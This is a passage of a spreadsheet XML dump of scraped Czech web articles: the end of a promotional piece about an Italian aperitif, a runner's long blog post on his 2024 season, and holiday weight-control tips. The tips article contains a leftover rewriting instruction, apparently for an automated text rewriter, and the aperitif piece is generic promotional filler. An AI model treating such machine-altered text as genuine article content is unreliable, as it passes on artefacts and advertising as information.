příležitosti a začali dosahovat svých cílů. Věříme, že naše recepty a doporučení vám dodají potřebné povzbuzení na vaší cestě ke zdokonalení. A pamatujte, jsme tady, abychom vám pomohli a podpořili vás na vaší cestě k úspěchu! Užijte si to a buďte nejlepší verzí sebe sama! Kde zakoupit Aperitivo Bitter San Fabio? Nemusíte hledat dál, protože nyní můžete zakoupit Aperitivo Bitter San Fabio přímo online! Tento lahodný a osvěžující aperitiv je nyní dostupný těm, kteří si rádi dopřávají chvilku odpočinku a rozkoše. Při nákupu Aperitivo Bitter San Fabio získáte nejen eleganci a kvalitu, ale také záruku originálního italského produktu. Vaše chuťové buňky budou nadšeně tancovat při každém doušku této lahůdky. Vyrobena z kvalitních a pečlivě vybraných zástupců rostlinné říše, přináší tento aperitiv jedinečnou kombinaci hořkosti a sladkosti, která se stane skvělým společníkem pro každou společenskou událost nebo relaxační večer. Náš online obchod nabízí snadný a pohodlný způsob, jak si zakoupit Aperitivo Bitter San Fabio. Stačí si vybrat požadované množství a přidat ho do košíku. Můžete si vybrat ze široké škály balení, která jsou skvělým dárkem pro vaše blízké nebo si sami dopřejte tuhle lahodnou lahůdku. Náš tým se postará o rychlé doručení a dodání přímo k vám domů. Tak proč váhat? Objednejte si Aperitivo Bitter San Fabio ještě dnes a začněte si užívat ty nejlepší chvilky plné radosti a rozkoše! Závěrečné myšlenky Doufáme, že tento článek vám poskytl jasné a přesné informace o Aperitivo Bitter San Fabio. Tento italský nápoj je skvělou volbou pro ty, kteří si rádi užívají jedinečné chvilky relaxace a osvěžení. S jeho lahodnou a vyváženou chutí, bohatou historií a kvalitními ingrediencemi zaručuje Aperitivo Bitter San Fabio nezapomenutelný zážitek. Ať už se rozhodnete tento nápoj ochutnat samotný, nebo si ho vychutnat v koktejlu, můžete se spolehnout, že vás každé doušky potěší jeho harmonie a výrazné aroma. Přejeme vám skvělý spánek, ponořte se do světa Aperitivo Bitter San Fabio a nechte se unést touto italskou dobrotou. Nenechte si ujít: Autor: Autor: | Driveway Rubrika transition_slide Fabia</t>
  </si>
  <si>
    <t>94</t>
  </si>
  <si>
    <t>20250101_150_3696044408_dd98fd483e7389db9ba7.html</t>
  </si>
  <si>
    <t>dd98fd483e7389db9ba7</t>
  </si>
  <si>
    <t>Zhodnocení NEJEN závodní sezony 2024</t>
  </si>
  <si>
    <t>Zhodnocení NEJEN závodní sezony 2024 JEDNODUCHÉ VĚCI NEMAJÍ ŽÁDNÝ SMYSL BĚH Potvrdit Pakliže uvážím jak se mi sezona 2024 nečekaně povedla, myslím, že se přemohu a po letech zde přidám trochu slov k mé dosavadně rozhodně nejlepší sezoně v mé „kariéře“ a hlavně CO vše k ní vedlo v minulosti. Vlastně více, než trochu, protože jeden článek z roku 2023 jsem si omylem smazal já vůl, takže pokud tě nebaví déle číst, raději ani nezačínej:-) Přece jen za těch skoro 10 let od mých prvních článků se toho v mém životě běžeckém trošku událo a rád bych to zde zmínil jak to vše na sebe navazuje a prolíná se. Nazdárek přátelé. Pár let jsem zde svůj blog nechal chřadnout, jelikož nováčkovské nadšení z prvních větších běžeckých závodů již dávno pominulo a upřímně se mi už ani nechtělo zde něco víc psát. Rád jsem si své zážitky, úspěchy i neúspěchy nechával pro sebe a na žádné sociální sítě se s nimi nechlubil. Běhal jsem s hodinkami za 300kč z „dekáče“ a neměl jsem ani stravu do roku 2023 listopadu. V říjnu 2023 se mi docela povedl závod Havířovská 10, kde jsem si tehdy zaběhl „PB“ na 10km za 35:13 a to byl impulz i od pár známých, že bych si na tu ruku měl cosi lepšího koupit. Pořídil jsem základní garminy a založil stravu. No až pak jsem sice zjistil, že Havířovská 10 2023 měřila jen 9 780 cca metrů čili by můj tehdejší osobák byl někde lehce pod 36 minut z původních 36:49 r.2022 by to ale i tak byl úspěch, nicméně rozhodně by mě to až tak nenamotivovalo si na ruku pořídit něco výkonnějšího. O tomto závodě jsem už tehdy zde chtěl napsat článek, ale omylem jsem si jej celý hotový smazal a nervy na to psát znovu jsem už neměl. Byl to do té doby můj nejpovedenější silniční závod ikdyž to tedy nebyla čistá desítka. Taky docela i napínavý, protože jsem se na obrátce kolem kuželu na cca 6km natáhnul na mokrém asfaltu jak dlouhý tak široký a sedřel si koleno a loket do krve, ale i tak jsem si tempo dokázal udržet a postupně i navýšit jak by to mělo v závodě být. Toť lehká introdukce a smyčka k tomu vymazanému článku a vůbec původu stravy, která spolu s „chytrými hodinkami“ pak vedla k následné akceleraci a větší motivovanosti do běhu a celé sezony 2024, kde jsem to postupně byl schopen i „prodat“. Obvyklým pravidlem v mých sezonách, když pominu léta páně 2020 a 2021, kdy jsem se závody díky nám všem velmi dobře známých okolnostem přestal a jen klusal, protože se všechny termínovky rozpadly, bylo že jsem se opravdu jen sem tam umístil na „bedně“ a vítězství závodu se mi povedlo na prstech jedné ruky plus na jednom benefičním běhu 5× kromě jednoho roku 2023, kde mě vypráskal pan Škapa. Čili být první pro mě bylo vážně velké unikum. V roce 2024 jsem „jaksi“ dokončil Lysacup, který jsem běhal každoročně všechny etapy tak na 13. místě celkově. Vážně žádná raketa ovšem pole běžců je zde vždy kvalitní, ostatně to zasvěcení vědí, že být v etapě do „desítky“ je cenné jako výhra závodu všude jinde. Alespoň já to tak viděl určitě vždy, když se mi to povedlo. Pak jsem měl jakési „mezidobí“ března, kde jsem tak něják poznával co umí strava.com a začalo mě bavit běhat rychleji a více, když jsem ty metriky pak mohl sledovat. Takže jsem začal upgradovat svůj intervalový tréning se kterým jsem poprvé začal v roce 2023 a také opravdu dlouhé LONG běhy. Doposud totiž mé běhání bylo velmi omezeno mou poruchou příjmu potravy spojenou s opravdu šíleným přejídáním, kterou jsem si sám stabilizoval až někde v červnu 2022 a mohl tak konzistentněji začít klusat a hýbat se bez myšlenek na jídlo a zda se zas přejím či nikoliv. Po takovém excesu to pak totiž bylo i 2–3 měsíce bez pohybu a dokola cyklus dieta-přejídání. Vše trvající od prázdnin mezi 6 –7 třídou,kde jsem se nárazově rozhodl shodit co nejvíce to šlo, jelikož jsem byl opravdu obézní klučina a okolí mi to dávalo sežrat. Takže za 2 měsíce to hodilo – 23 kilo a nějáký jakože začátek pohybu. Stabilizací a úpravou tohoto jsem defakto teprv toho léta 2022 mohl fakt začít jen myslet na tréning. A jelikož další má „porucha“ se jmenuje dysmorfie, což třeba velice dobře popisuje i špičkový atlet Tim Tollefson a mnozí jiní atleti, že tím trpí. V podstatě jistá závislost na každodenním pohybu, tak aby vaše tělo vypadalo dle vašich představ. Takže když si nezaběhám každý den lehce či více nebo k tomu nazaposiluji, nejsem schopen fungovat. Proto jsem i tehdy 2020 dík „kovídku“ a rouškám ve vlaku začal místo vlakem do práce běhat. Díky za „kovyd“:-) Mám to nejkratší trasou cca 10 km, ale postupně se samozřejmě začala vzdálenost modifikovat, když jsem třeba před noční potřeboval dát LONG a nebo nějáké intervaly BO jindy bych to v týdnu nenapasoval. Takže přes tyto stabilizační kroky jsem byl už tedy schopný nakopnout ty intervaly v roce 2023 a překonat jistá úskalí bolesti a nekomfortu při takovém tréningu. Zároveň si být i jistý, že pokles glykémie a zvýšená námaha mi pak nezpůsobí další výkyv stravy a režimu celého procesu, protože o ten už jsem se mohl pevně opřít. A co si budem, kromě spánku, který moc tedy kvalitní dík směnám nemám, tak je strava a režim jídla absolutně klíčový element jak si pomoci k lepším výsledkům, ale i obecnému „wellbeingu“ v životě celkově. O rok později tedy někde v dubnu jsem se k intervalům vrátil, tělo po LC už spočlo a postupně jsem mohl navyšovat jak frekvenci takových běhů týdně tak i KM týdně celkově. První nečekané ovoce to přineslo již v tom dubnu 2024, kdy jsem v Paskově na paskovské devítce, která měla reálně 9,3km, ideálně rovinatý povrch bez ostrých zatáček sice „prohrál“ souboj o celkové vítězství. Celý závod jsme běželi s T. Klášterkou a M. Mokrošem a až v posledních 200m mi postupně oba cukli a na mě „zbylo“ třetí místo. Ovšem celkový mezičas na těch 9,3 km mě motivoval jak jsem i předem měl v plánu to proběhnout do 4. kola na celých 10km a reálně dle hodinek si ten osobák udělat. Pár lidí bylo sice vyděšených kam to jako dál běžím pak, ale nakonec jsem si vtipně ten osobák na čistých 10Km stanovil na 35:12, ale strava mi tam započítala 35:13, takže identicky jako na té domnělé desítce v Havířově . Posun to ale byl a byl jsem spokojen. Přišla půlka dubna a má první letošní výhra na Hrabovské pětce, která měla velice solidní čelo asi 5–6 běžců kterou jsme postupně roztrhali a já jsem se v posledních 500m ocitnul na prsa s mladým triatletem T. Pavelkou. Konce závodů v takové pozici jsem nebyl schopen zvládat běžně. Ale ikdyž jsem věděl, že ani za první místo nedostanu zlatou kytáru, tak jsem před ostrou zatáčkou 200m před cílem zkusil jít přes tu bariéru bolesti, nabehnout do ní první a čekat co se stane. V takové fázi už pak vždy hlava ví, že skutečný cíl je sice ještě 200m, ale mnohdy stačí právě v této fázi pohnout prdelí a pak už to prostě nepustíš a jen ještě o to víc akceleruješ. Povedlo se, akorát jsem se absolutně nebyl schopen kouknout na to, že v cíli mám 4,940m a né čistou pětku na kterou mám PB z jara 2023 za 17:35. V cíli jsem byl za 16:51. Docela fajn pocit vyhrát i jiný, než onen zmíněný benefiční běh v Ostravě konaný vždy v říjnu. To teprve pořádně zažehlo tréningový entuziasmus a začalo mi šmakovat dávat si víc a dál, než jsem kdy běhal. Nebudu zde vypisovat všechny „bednové“ úspěchy roku 2024, ačkoliv hodnotově a zvládnutým vývojem závodu byly některé mnohem cennější, než jiná prvenství. Další výhra na sebe nenechala dlouho čekat a sice na mém srdcovém závodě Vyběhněte s děkanem v Karviné . Běžel jsem ho snad 6 krát. Zažil jsem zde hrozné kolapsy, kdy v roce 2017 jsem 500m před cílem absolutně odpadnul z boje alespoň o bronz a doběhl pátý. Přes konečně i třetí a pak i druhé místo další roky. Takže s formou 2024 jsem to zde opravdu chtěl vyhrát a zároveň zaběhnout na 5,5km trati i dobrý čas. Vždy min 2–3 nadstandartní běžci se zde objeví čili jsem byl v očekávání jak se to vyvine letos. Jedním z velice dobrých účastníků, který mě zde vždy porazil o parník byl nestárnoucí matador M. Škapa. Ten se objevil i letos. Závod jsem ale rozběhnul stylem start-cíl tzv. a od druhého km jsem měl v podstatě hlavní cíl co nejvíce stlačit čas pod dosavadní nejlepší z roku 2019 a sice 19:17. To se docela povedlo a pásku jsem protnul časem 18:27. Vcelku hype, že se mi hlavně podařil ten čas. Na jaře 2024 jsem si vyřešil i jednu další extra důležitou osobní věc a byl jsem i po této stránce absolutně v laufu, že se daří zkrátka. V pořadí třetí triumf pak přišel prakticky za dva týdny nato na závodě Mezi náměstími ve Frýdku . Běží se 4,7km se startem i cílem z Místeckého náměstí. V průběhu se postupně stoupá a pak klesá z Frýdeckého náměstí a zpět. Takový delší sprint. Zde bývá vždy velká konkurence o příčky bednové a mé hlavní ambice byly pokorné hlavně si vylepšit čas zde z roku 2022 a sice 16:48. Na startu vidím silné koně a tak si jej rozběhnu konzervativně s tím, že prvního H. Hlavatíka s jeho startovním tempem pod 3min/km fakt nemá smysl následovat, když chci mít dobrý hlavně závěr a celkový čas. Celou dobu se držíme ve 3 a postupně 2 členné skupince o druhé místo. Když stoupáme k otočce ke kašně na Frýdeckým náměstí, běží se mi skvěle a náskok H. Hlavatíka se začíná tenčit každým metrem. Ucítím šanci ještě před koncem stoupání pohnout prdelí, utrhnout se jak druhému běžci a jít i před Honzu, sledovat co bude pak v seběhu. Seběh pak pustím skoro jak finální sprint, abych z jednoho metru co nejvýše navýšil náskok v nejprudší části zpět na hlavní cestu. Míjíme ostatní běžce a mnozí povzbuzují, což mě velmi motivuje do toho šlapat a hlavně necivět za sebe, což je další věc na které letos dost v hlavě pracuji:-) Poprvé se podívám až při vběhu na sídliště, když mě duchaplný policista řídící provoz správně koriguje, že je odbočka jinde mezi baráky. Trošku jsem zaběhl mimo trasu a znejistěl jaký je náskok. Ten jsem měl stále cca 50–70 metrů a do cíle zbývala táhlá rovinka 300m a pak samotný vběh po dlažebních kostkách na místecké náměstí, kde už by se sprintovalo fakt blbě. Takže tuto rovinku napružím tak, až cítím jak se „pálí“ maso. Asi v její polovině předbíhám přede mnou razící auto městské Policie, která jede prostě moc pomalu. Strážník mě pak dojede, stáhne okýnko a ptá se mě, zda nechci vodu. Odvětím jen " jaký mám náskok". Odpověď, že asi 70 m mě uklidní. Docela vtipná situace, ale pomohla mi se nekouknout za sebe. Náběh na náměstí a ty blbé kostky už jsem si čistě užil, že jsem bojoval s časomírou jen. Také poprvé při výhře bylo v cíli docela dost lidí a tak jsem si nemohl dovolit to odfláknout. Doběhnu za 16:12. V cíli si zařvu a né jednou, vypustím všechnu tu bolest ven a užívám si ten pocit podobný opiovému opojení bojovníka Talibanu . Já abstinent vyhraji bečku piva jako hlavní cenu mimo jiné. Někdy snad vyhraji závod, kde bude hlavní cena třeba 5kg proteinu? Ale darovanému koni na zuby nehleď žejo. Hodně mě potěšil svými slovy jeden činovník atletiky FM, neznám bohužel jméno. Při předáván cen ocenil mé vypuštěné emoce v cíli a že on sám jako běžec a trenér toto velice dobře zná a líbilo se mu to. Následovaly závody, kde bedny byly, ale na další vítězný a asi nejcennější triumf jsem si musel počkat až do srpna. Během letních měsíců jsem si dal fakt nejnáročnější blok tréningů a KM v životě. Ten se však vyplatil. Začátkem srpna se běžela klasika v Mniší 10km, docela kopcovitá s cca 170 m převýšením a hlavně každoročně velkým vedrem. Tady mám 3 účasti. Jednou z toho bylo druhé místo a čas od roku 2021 jsem každý rok vylepšil. Tedy ani letos nebyl můj cíl jiný, než si hlavně zas o cosi zlepšit 38:12 čas z roku 2023. Nikdy zde není nouze o velice kvalitní a daleko lepší běžce, nežli já. Letos zde je opět silná sestava a do prvních 3 km, které jsou v podstatě jako běh do vrchu postupně nechávám běžet a nejsem schopen akceptovat tempo M. Holiše a T. Klášterky. Měl jsem své mezičasy na jednotlivých km a věděl jsem, že když je přepálím, tak pak bude celý závod stát za prd. Nicméně na seběhu čtvrtého a vlnícím se terénu do otočky na pátém km, se mi daří postupně dotáhnout T. Klášterku a pár metrů před zastavením se a oběhnutím kuželu zase zpět do kopce si řeknu, že zkusím přidat ještě víc a jít do stoupání zpět o jeden krok první. Samozřejmě pak do kopce akceleruji, abych co nejvíc náskok navýšil. To se daří. Vznikne asi 10–15 m avšak do té doby perfektně běžící M. Holiš si stále drží o cca 30–40m svou první pozici. Poslední táhlé stoupání na sedmým km, které je i dost na slunci mi ale napoví, že pokud je šance zaútočit, tak tady. Ještě před koncem stoupání a začátkem seběhu jej docvaknu a jdu ihned co nejvíce před něj. Jakmile začne seběh vedoucí prakticky až do 9,7 km kde je 300m lehce do kopce do cíle, tak to peru přes bolest stehen i celého těla co to jde. V těchto metrech je to docela o hubu, protože člověk běží úzkou cestou a v mnoha zatáčkách nelze vidět, zda nejede auto. Roky předtím jsem obzvlášť v jedné fakt raději zpomalil, ale letos mi je to fuk. Vyjde to a nejede nic:-D. Letos totiž o hladký průjezd dbá auto městské Policie. Na zhruba konci devátého kouknu za sebe a vidím, že 100m za mnou není nikdo. Zbývá poslední nejprudší kilák dolů a zas souboj akorát tak o ten co nej čas. Co se však nestane? V té nejširší části té jinak úzké cesty se to auto poldů setká a zastaví spolu s traktorem. Řidiči policista vysvětluje, že se blíží cca 100 účastníků běhu. Blížím se a jediná možnost kudy to vzít je asi v půlmetrové skulině mezi nimi v tempu 3:10. Ale bylo mi vše jedno a naštěstí má droboulinká postava proskočila a pokračuju dále. Konec pak naperu co to jde a doběhnu za 37:03. Samozřejmě v cíli zas křičím, abych tu bolest oslavil. Ale já hlupák si myslel, že ten loňský čas byl nikoliv 38:12, ale 37:12. Takže zlepšení o 9s mě upřímně moc neuspokojilo. Vše mi došlo až večer, když jsem si mozek osvěžil retrospektivním pohledem na výsledky 2023 a že ten čas jsem pokořil o 1 min a 9s. Až toto pro mě byla fakt obrovská satiskace a přišla větší radost. Kilometráž celkově mě motivovala k tomu, abych zkusil i cosi delšího, než jen pětky a desítky. Kdysi jsem sice běhal hodně ultra atd, ale to jsem měl jakože „prostě na účast“ a v terénu. Nic jako rovinatý půlmaraton jsem nikdy neběžel. Navíc po shlédnutí průběžných výsledků MS poháru mi bylo jasné, že i se svým omezeným počtem dosavadních závodů oproti jiným účastníkům, mám po výhře v Mniší docela šanci být v TOP 5 ke konci roku, kde jsou prize money a pak i za věkovou kat. Navíc děkuji jednomu nejmenovanému člověku za velmi negativní zkušenosti s ním, že díky němu, jsem se letos rozhodl NEběžet Lysacup a mohl jsem napřít síly na tréning na silnici. Ukázkový příklad jak velice emotivně negativní věc je možno uchopit naopak ve svůj prospěch a moc mu zato děkuji:-) Další v pořadí MS poháru byl navíc koncem srpna jako „nasnadě“ Hrabovský půlmaraton. Takže prima šance to prostě jen zkusit a získat nějáké body do tohoto celkového pořadí. Absolutně bez ambicí na jakýkoliv čas či pořadí. Zde se rovněž účastní každoročně běžci daleko lepší, než já a proto k tomu jdu s čistou hlavou a pokorně. Trasa má 6 okruhů a každý okruh je z půlky tvořen nikoliv asfaltem, ale mírnou šotolinou. V závodní den je vedro jak v prádelně. V tom jsem ale už doběhal spoustu „longů“ čili obavy nemám. Rovněž co jsem s longy začal, tak i běhy přes 30KM jsem schopný běžet bez kapky vody či třeba gelů a jakéhokoliv občerstvení. Ba spíš naopak, když jsem to párkrát zkusil, bylo mi to jen na obtíž. Nepochopíš, ale mám to tak. Navíc všechny závody a vlastně i běhy ostatní nejlépe zaběhnu mezi 17–19h půstu PŘED činem:-) Je to extrém, ale já jsem extrémista a nikdy tomu nebude jinak. Jelikož režim intermitent fasting mi celkově dopomohl si vyléčit své obsesivní přežírání, je to fakt kůň na kterém jsem si jistý „cválat“. Závod rozběhnu fakt konzervativně a s tím, že první desítku chci mít rozhodně pomalejší, než zbytek závodu a max do 39 minut. Samozřejmě se nechám zlákat tím, že letos není „tak silná“ konkurence a jsem na čele a jdu jí kolem 37:19 tuším. No a pak to byla čistě „elimination game“ a 3 kola do konce, zda to hlava i tělo tím tempem cca 3:45 a pak už spíš kolem 3:55 vydrží a nikdo mě nedotáhne. Běh hlavně v posledním kole už technicky byl jako voják ze západní fronty, ale dotáhnul jsem to na poslední 200m asfalt rovinku, kde s náskokem asi 5 minut na druhého zvítězím. Čas nikterak ohromující za 1:21:12 myslím. Myslel jsem si totiž naivně pod 1:20, ale to by nesmělo být 30 ve stínu a hodně trasy po šotolině. Tož fajné a opět překvapivé. Vypotil jsem tehdy tolik, že jsem měl pocit, že sluneční záření mnou prostupuje skrz na skrz jako RTG záření a že na sobě nemám nic kromě kostí. Velice bizarní pocit, ale cítil jsem se v cíli absolutně fantasticky a šel jsem ještě cca 4km klusat. Další prvenství mě „postihlo“ na závodě Studénecká pětka koncem Září. Zde jsem ani jet neplánoval, protože to bylo jen pár dní po jiném náročném závodě, ale říkal jsem si, že ikdyž to je 2,5km do kopce a pak obrátka z kopce, tak to něják prostě docvaknu a třeba vyjde i bedna. Taky zde běhají na první tři místa vždy kvalitní borci a proto opět pokorně startuji s cílem hlavně mít dobrý čas. Na prvním a druhém km, kde se trasa jednak zvedá plus fouká navíc docela silný protivítr, jsme ve 3 členné skupince s borci M. Mokrošem a M. Vinklárkem. Tempo kolem 3:20 postupně v kopci zpomaluji s cílem to nepřepálit. Postupně cítím, že běžím jen s jedním borcem, který se drží přesně půl metru za mnou a těží z relativního štítu proti větru. Zkouším kličkovat napříč cestou, aby pochopil, že by mě třeba mohl vystřídat. Myslel jsem, že to je právě Mirek, ale ten už byl za námi daleko a byl to M. Vinklárek. K otočce ke kuželu na 2,5 km to je z kopce a zkusím tedy kopnout do vrtule a setřást jej i v tom protivětru. Nepodařilo se a jdeme do seběhu na čtvrtém km stále jako člověk a klíšťátko na zádech. Docela se přiostřuje co teda jako bude tempem 3:10. Kritický bod si stanovím jedinou ostrou zatáčku na cca 4500 a následný asi 150m trailový výběh kolem kostelíka, kde chci zaútočit. Ikdyž tělo samozřejmě říká zastav bo zdechneš, tak jdu do útoku a výběh jdu co mi síly stačí. Slyším, že kroky za mnou se vzdalují. 200m do cíle se kouknu a vidím, že mám vyhráno a náskok 50m. Nicméně seběh k cíli ještě patřičně napružím jakoby šlo o život, tak aby to pořádně bolelo. Tady v cíli sice uspokojení bylo, ale závod to byl menšího ražení. Tento rok poslední první místo jsem bohužel opravdu „utrpěl“ díky své nouzové účasti na běhu Šenov run. Zde konstatuji nouzové, protože jsem cílil na běh rodným krajem E. Zátopka a ten byl zrušen vinou povodní. Takže jsem si náhradně vybral tento 10km vlnitý závod se 156 m UP. Konkurence i zde však na bednu byla. F. Holotík a T. Štverák byli hlavními oponenty. Na prvním km si Tomáš špatně odbočil div nespadnul, ale rychle se tempem 3:10 vrátil ke mě a Filipovi. V průběhu druhého km, který docela začal stoupat jsem už šel spíš do 3:40 konzervativnějšího tempa, abych viděl jak si Tomáš valí možná kolem 3:00 na km do toho kopca. Hm a byl fuč:-D Dobrý satan i na téhle distanci říkám si. Za mnou se drží cca 50 m Filip. Trasa se pak po chvíli mísí s účastníky 5km běhu. Po chvilce, ale zas odbočuje a klesá do údolíčka. Nastává první z asi 5 peklíček „kudy jakože“ běžet, protože cesty vedou v tom lese různě, ale chybí fáborek či člověk udávající směr. Toma už fakt nevidím a tak se naštěstí vždy rozhodnu správně intuitivně. Kromě jednoho momentu, kdy už Filip je cca 30m za mnou a čeká nás výběh na sedmém km asi nejprudšího 200m kopečku. Zaběhnu mylně asi 15m a vracím se. Už mě takřka má říkám si. Ale snažím se vydržet kopec běžet jak nejlépe umím s cílem znovu zaútočit přes horizont a v následném seběhu si vše zas vzít zpátky. Seběh jdu tempem 3:10 i rychlejc. Náskok si zas pojistím a vím, že před cílem je ještě poslední táhlý kopec. Nikde ho ale nevidím sakra a to jsem minul devátý kilák. Najednou se zjeví. Náskok je furt těch 50–70metrů. Nic extra na to, aby si to člověk jen odklusal. Jdu do první půlky stejně rychle jak po rovině úsilím. Pak se ohlédnu, zda jakože dobrý. Mám druhé místo v kapse si říkám. Následuje seběh přes hlavní cestu na místní fotbalové hřiště. Asi 30m před cílem je buď kluzká tráva prudce dolů a nebo maličké schůdky po kterých dobíhají pětku. Přede mnou je malá holčička a tak abych jí nesrazil zpomalím a zastavím, že náskok mám velký. Pak mi to nedá a vezmu to po trávě i přes riziko pádu a dosprintuju jak se patří. Direktor závodu mi oznamuje, že jsem jako první na desítce a ptá se mě mikrofonem na dojmy:-D Tak popisuju jak jsem bloudil a že kde je jako Tomáš?:-D Ten si bohužel zaběhl přes kilák a i tak dobíhá s neskutečným průměrem na km na třetí pozici za Filipem. Takže toto prvenství bylo fakt omylem. Vtipné ale bylo, že na tombolu vždy nečekám a po vyhlášení mažu domů bo nikdy stejně nevyhraju a ceny mě moc nenadchnou. Tady ovšem byla tombola první a pak až vyhlášení. Takže sedíme a čekáme asi půl h s borcem Hektorem, který mě vezl a taky zaběhl bednu. Přicházejí poslední dvě ceny a sice dvě bečky piva myslím 30l? Asi, nevím. Hektor říká žertem, že jako abstinent to vyhraju já. Na první bečku není nikdo. Vyhlašuje se druhá. Flaša David. No prosím. Zhluboka se zasměju a mám upřímnou radost. Abychom se dostali ke grandioznímu závěru a nějáké konkluzi. Tak samozřejmě vrchol jsem chtěl na Hornické 10 a běžet pod 35 minut hlavně. Tento časový cíl se však hodně mísil i s ambicemi být v kat. 35–44 na bedně, protože co se časů týče dost roků zpětně k top5 vyhlašovaným „postačovaly“ časy okolo 35–36 i více minut. Takže jsem první dva, tři km rozběhl velice naivně a nad plán splitů na km s hlavními rivaly, kteří dle mých znalostí v té mé kat. byli. Na třetím jsem postupně musel z tempa 3:25 zvolnit s tím, že přece borci taky musí zvolnit. Ale zejména tedy Z. Škuca, kterýho se mi předtím povedlo na jiných závodech dvakrát porazit, se fakt jakože tento den předvedl a zaběhl neskutečný osobák myslím o více jak minutu a byl zaslouženě na podium. Také Honza Benbenek si zde zaběhl raketový čas a osobák a ukázal mi záda. No holt já dobíhám za 35:16, když si na sedmém říkám,zda to vůbec má cenu běžet. Na osmém mám myslím 3:37 a zachraňuju to na desátem s cílem aspoň to potrhat o pár sekund POD 35:13:-D Vtipně se mi to nepodaří i kdybych se rozkrájel i přes skoro 200m sprint do sr*ček o ty 3 sekundy. Ještě bych zapomněl na své vítězství v PODzimní kopečkové, kde to bylo cca 12,7 km v okolí Datyňských vrchů. Já byl po jedné noční a šel pak odpo na druhou. Byl to hlavně závod do poháru a účastí fakt maličký. Zcela se mi vytratil z paměti. Ale zabrat dal i tak a běžel jsem jej stylem start – cíl. A co se mi povedlo na Sylvestera Stalloneho bylo úspěšně zakončit MS běžecký pohár během v Karviné . Tam jsem zkončil třetí a v poháru také třetí celkově a druhý v kategorii. Vím, je to lehce obsáhlejší čtení, ale chápej… je tu 10 let života skoro. Jsi fakt borec, borka pakliže jsi to někdo dočetl až sem a klidně se neboj i napsat reakci:-) Sepsat to pro mě byl možná větší výkon, než všechny ty km a výškové metry uběhnout jelikož na toto nemám moc trpělivost, ale budu rád, když se to dostane někomu pod oči a možná… něčím pobaví, inspiruje. Samozřejmě viděno optikou běžců, kteří běhají desítky pod 33–34 minut toto může znít vtipně celé, ale přeci jen jsem sám sobě největším soupeřem a nejvíce porovnávám sebe samého a své staré časy na různých tratích. Tam jistý pokrok letos nastal a proto tahle dřina to zaznamenat:-) Tak díky a čůs. Zdravíčko, budu zde psát o svých počinech v běžeckém světě:-) ve všech blozích Odkazy Autor: David Flaša Autor person David Flaša</t>
  </si>
  <si>
    <t>20250101_151_3696377924_0b90931533528d669a6b.html</t>
  </si>
  <si>
    <t>0b90931533528d669a6b</t>
  </si>
  <si>
    <t>Jednoduché návyky, které vám pomohou zabránit vánočnímu přibírání na váze</t>
  </si>
  <si>
    <t>Jednoduché návyky, které vám pomohou zabránit vánočnímu přibírání na váze Během svátků, které jsou nejen časem radosti a pohody, často přibíráme na váze v důsledku konzumace kalorických jídel a menší aktivity. Přesto však existují způsoby, jak si užít sváteční chvíle s rodinou a přáteli, aniž bychom museli obětovat kontrolu nad svou váhou. 1. Zachovej přibližný rozsah. Pokud se něco nachází uvnitř html tagů uprav pouze část před tagem, tag a vše po vrať v nezměnněnné podobě. Vypiš pouze prostý text (včetně html tag) bez tvé ostatní komunikace Plánujte si svátky Plánování je klíčem k tomu, jak se vyhnout přibírání na váze během svátků. Můžete si naplánovat, jaké jídlo budete konzumovat a kolik, abyste se vyvarovali nadměrnému přejídání. Zkuste si také vybrat zdravé alternativy k tradičním svátečním jídlům, které obsahují méně kalorií a tuku. 2. Omezte velikost porcí Během svátků bývají porce často větší než obvykle. Snažte se omezit velikost porcí a konzumovat menší množství jídla. Můžete použít menší talíře, které vám pomohou kontrolovat množství jídla, které si naberte. 3. Vyvážená strava Sváteční jídla nejsou vždy nezdravá, a můžete si vybrat jídla, která jsou bohatá na vlákninu, zeleninu a bílkoviny. Snažte se vyvážit svůj talíř tak, aby obsahoval různé složky, a vyhněte se nadměrnému množství cukrů a tuků. 4. Nepřeskakujte snídaně Snídaně je důležitým jídlem, které vám dodá energii na celý den. Nepřeskakujte ji, i když víte, že na vás čeká bohatý sváteční oběd nebo večeře. Snídaně vám také může pomoci omezit přejídání v průběhu dne. 5. Dejte si pozor na alkohol Alkoholické nápoje jsou během svátků běžné, ale mohou přidávat spoustu kalorií k vaší stravě. Snažte se omezit konzumaci alkoholu a dávat pozor na jeho kalorický obsah. Volte také méně kalorické varianty, jako jsou světlé pivo nebo víno . 6. Aktivita a cvičení I během svátků je důležité udržovat fyzickou aktivitu. Zkuste si najít čas na krátké procházky, cvičení nebo sportovní aktivity, které vás baví. Fyzická aktivita vám pomůže spálit nadbytečné kalorie a udržet váhu. 7. Mějte plán na zvládnutí stresu Sváteční období může být stresující, což může vést k emočnímu přejídání. Mějte plán na zvládnutí stresu, jako jsou relaxační techniky, meditace nebo jiné aktivity, které vás uklidní. 8. Pozitivní postoj k jídlu Nakonec si pohlídejte svůj postoj k jídlu. Mějte pozitivní a zdravý vztah k jídlu, nepovažujte ho za nepřítele. Je možné si užívat sváteční jídla s mírou a bez pocitu viny. Přibírání na váze během svátků není nevyhnutelné. S plánováním, rozumným přístupem k jídlu a aktivitou můžete udržet váhu a zároveň si užít radostné sváteční okamžiky s rodinou a přáteli. Buďte proaktivní a mějte na paměti, že každý malý krok směrem k zdravějšímu životnímu stylu má pozitivní vliv na vaše zdraví a pohodu. Zdroj: https://www.webmd.com/obesity/features/dont-gain-weight-during-the-holidays Autor: Jana Fišerová Autor person Jana Fišerová Rubrika transition_slide Aktuality</t>
  </si>
  <si>
    <t>107</t>
  </si>
  <si>
    <t>103</t>
  </si>
  <si>
    <t>20250101_152_3696054650_338d27443583220251d1.html</t>
  </si>
  <si>
    <t>338d27443583220251d1</t>
  </si>
  <si>
    <t>Péče o pokožku, vlasy a vousy je v zimě nezbytná</t>
  </si>
  <si>
